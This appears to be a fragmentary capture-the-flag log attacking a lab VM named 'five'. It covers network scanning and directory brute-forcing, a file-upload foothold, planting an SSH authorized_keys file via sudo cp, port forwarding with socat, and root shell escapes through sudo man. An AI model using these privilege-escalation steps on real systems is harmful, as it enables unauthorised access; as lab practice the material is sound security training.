┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c: 29: ff: 66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a: 00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27: dd: ef: c8       PCS Systemtechnik GmbH
192.168.31.177  08:00:27: fe: 58: c8       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.411 seconds (106.18 hosts/sec). 3 responded

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# rustscan -a 192.168.31.177 -r 1-65535
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TCP handshake? More like a friendly high-five!

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 192.168.31.177:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-07 01:31 EDT
Initiating ARP Ping Scan at 01:31
Scanning 192.168.31.177 [1 port]
Completed ARP Ping Scan at 01:31, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:31
Completed Parallel DNS resolution of 1 host. at 01:31, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:31
Scanning 192.168.31.177 [1 port]
Discovered open port 80/tcp on 192.168.31.177
Completed SYN Stealth Scan at 01:31, 0.02s elapsed (1 total ports)
Nmap scan report for 192.168.31.177
Host is up, received arp-response (0.00042s latency).
Scanned at 2025-05-07 01:31:14 EDT for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:FE:58:C8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# gobuster dir -u "http://192.168.31.177" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.177
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 185] [--> http://192.168.31.177/uploads/]
/admin                (Status: 301) [Size: 185] [--> http://192.168.31.177/admin/]
/upload.php           (Status: 200) [Size: 48]
/robots.txt           (Status: 200) [Size: 17]
/upload.html          (Status: 200) [Size: 346]

------WebKitFormBoundaryRK8GGBtt0YpPaKBf
Content-Disposition: form-data; name="directory"

uploads/
------WebKitFormBoundaryRK8GGBtt0YpPaKBf
Content-Disposition: form-data; name="submit"

Upload File
------WebKitFormBoundaryRK8GGBtt0YpPaKBf--

www-data@five:/$ sudo -l
Matching Defaults entries for www-data on five:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on five:
    (melisa) NOPASSWD: /bin/cp

www-data@five:/tmp$ ss -lntup
Netid   State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port

udp     UNCONN   0        0                0.0.0.0:68            0.0.0.0:*

tcp     LISTEN   0        128            127.0.0.1:4444          0.0.0.0:*

tcp     LISTEN   0        128              0.0.0.0:80            0.0.0.0:*       users:(("nginx",pid=409,fd=6))

tcp     LISTEN   0        128                 [::]:80               [::]:*       users:(("nginx",pid=409,fd=7))

www-data@five:/tmp$ nc 127.0.0.1 4444
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2

socat TCP-LISTEN:4445,fork TCP4:127.0.0.1:4444 &

www-data@five:/tmp$ ls
authorized_keys
systemd-private-51833796905d4c16b06d8f390a64e61b-systemd-timesyncd.service-LEvzQE
user.txt
www-data@five:/tmp$ sudo -u melisa cp ./authorized_keys /home/melisa/.ssh

melisa@five:~$ sudo -l
Matching Defaults entries for melisa on five:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User melisa may run the following commands on five:
    (ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm, /bin/clear

sudo man man
!/bin/sh

Controlling formatted output
    -P pager, --pager=pager
           Specify  which  output  pager  to use.  By default, man uses pager, falling back to cat if pager is not
           found or is not executable.  This option overrides the $MANPAGER environment variable,  which  in  turn
           overrides the $PAGER environment variable.  It is not used in conjunction with -f or -k.

           The  value  may  be a simple command name or a command with arguments, and may use shell quoting (back‐
           slashes, single quotes, or double quotes).  It may not use pipes to connect multiple commands;  if  you
           need  that,  use a wrapper script, which may take the file to display either as an argument or on stan‐
           dard input.

melisa@five:~$ sudo man -P less id
!bash